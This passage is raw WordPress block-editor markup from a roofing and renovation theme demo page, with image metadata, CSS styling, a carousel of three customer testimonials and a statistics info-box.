Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"a71d05cc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-a71d05cc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-a71d05cc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-a71d05cc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a3113ac5-0315-4980-91d6-5f8fca2f2ce6\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a3113ac5-0315-4980-91d6-5f8fca2f2ce6.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"724647d4-72e4-4f11-823a-ed346d86135e\"} -->\n<style type=\"text/css\"> .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-724647d4-72e4-4f11-823a-ed346d86135e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-724647d4-72e4-4f11-823a-ed346d86135e skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"98ff327e-941a-4894-bff7-2d76ffc2b5d9\"} -->\n<style type=\"text/css\"> .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-98ff327e-941a-4894-bff7-2d76ffc2b5d9 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-98ff327e-941a-4894-bff7-2d76ffc2b5d9\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"f369bfc5-c626-4c6c-93f0-eef984046450\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-f369bfc5-c626-4c6c-93f0-eef984046450 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"f14f54ba-714b-48b2-a325-d252606e8a97\"} -->\n<style type=\"text/css\"> .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f14f54ba-714b-48b2-a325-d252606e8a97 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f14f54ba-714b-48b2-a325-d252606e8a97\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"15454e94-baea-43b6-bd47-7e960bc3f840\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-15454e94-baea-43b6-bd47-7e960bc3f840.skt-blocks-infobox__content-wrap 